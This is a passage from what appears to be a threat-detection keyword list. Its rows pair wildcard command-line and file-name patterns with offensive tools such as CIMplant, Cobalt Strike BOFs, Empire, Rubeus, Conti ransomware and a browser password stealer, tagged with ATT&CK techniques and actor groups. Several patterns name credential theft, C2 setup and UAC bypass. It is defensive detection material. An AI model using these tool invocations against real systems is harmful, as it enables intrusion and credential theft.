- T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,0,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -* -c '/accepteula /s calc.exe' -e PsExec64.exe*,offensive_tool_keyword,pywsus,The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.,T1505.003 - T1001.001 - T1560.001 - T1071.001,TA0003 - TA0011 - TA0002,N/A,N/A,Network Exploitation tools,https://github.com/GoSecure/pywsus,1,0,N/A,N/A,3,248,38,2022-11-11T19:59:21Z,2020-08-11T21:44:35Z -* -c active_users -u *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -c all -d * --domaincontroller *,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* -c command_exec --execute tasklist*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -c command_exec --execute whoami*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -c CredEnum.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,0,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -* -c edr_query *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -c logon_events * -u *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -c ls --directory * -u * -p *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -c process_kill --process *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -c service_mod --execute create -s *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -c upload --fileto * --file *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -c vacant_system * -u *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -c -w *.txt -w *.txt --ss *,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* -c -w methods.txt -p 127.0.0.1*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* -c -w users.txt --hs *,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* -c -z file*users.txt -z file*pass.txt *,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* -c -z range*1-10 --hc=BBB http*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* C:\ProgramData\sh.txt*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* C:\temp\w.log*,offensive_tool_keyword,SharpEfsPotato,Local privilege escalation from SeImpersonatePrivilege using EfsRpc.,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bugch3ck/SharpEfsPotato,1,0,N/A,10,3,241,40,2022-10-17T12:35:06Z,2022-10-17T12:20:47Z -* C:\Users\Public\build.bat*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -* C:\Users\Public\build.vbs*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -* C:\Users\Public\DtcInstall.txt*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -* c2 add *,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -* c2 start http *,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -* -c2server *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -* --CaCertPath *.pfx --CaCertPassword *,offensive_tool_keyword,ForgeCert,ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.,T1553.002 - T1136.003 - T1059.001,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/GhostPack/ForgeCert,1,0,N/A,10,6,538,87,2022-10-07T18:18:09Z,2021-06-09T22:04:18Z -* CallDirect.py*,offensive_tool_keyword,POC,Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration,T1046 - T1595 - T1587,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/yunuscadirci/CallStranger,1,0,N/A,N/A,4,391,70,2021-08-07T16:48:55Z,2020-06-08T07:37:49Z -* CallStranger.py*,offensive_tool_keyword,POC,Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration,T1046 - T1595 - T1587,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/yunuscadirci/CallStranger,1,0,N/A,N/A,4,391,70,2021-08-07T16:48:55Z,2020-06-08T07:37:49Z -* -caplet *.cap,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -* cassandra-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* cassandra-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* cccam-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* certipy-ad*,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -* changepw * /ticket:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* charlotte.cpp*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,0,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -* charlotte.dll *,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,0,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -* CharSubroutine-Macro.xls*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,0,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -* -CheckShareAccess -Verbose*,offensive_tool_keyword,powersploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -* --check-tor *,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* -ChildPath *fodhelper.exe*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-FodHelperBypass.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -ChildPath *sdclt.exe*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-SDCLTBypass.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* chimera.py *,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,0,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z -* chimera.sh*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,0,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -* chimera_automation *.exe*,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,0,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z -* chrome logindata *,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,0,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -* chrome masterkey *,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,0,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -* chromium_based_browsers.py*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -* cics-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* cics-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* cics-user-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* cics-user-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* CIMplant.exe*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* citrix-brute-xml.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* citrix-enum-apps.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* citrix-enum-apps-xml.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* citrix-enum-servers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* citrix-enum-servers-xml.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* clamav-exec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -client ftp -ip * -Username * -Password * -Datatype ssn -Size * -Verbose*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - 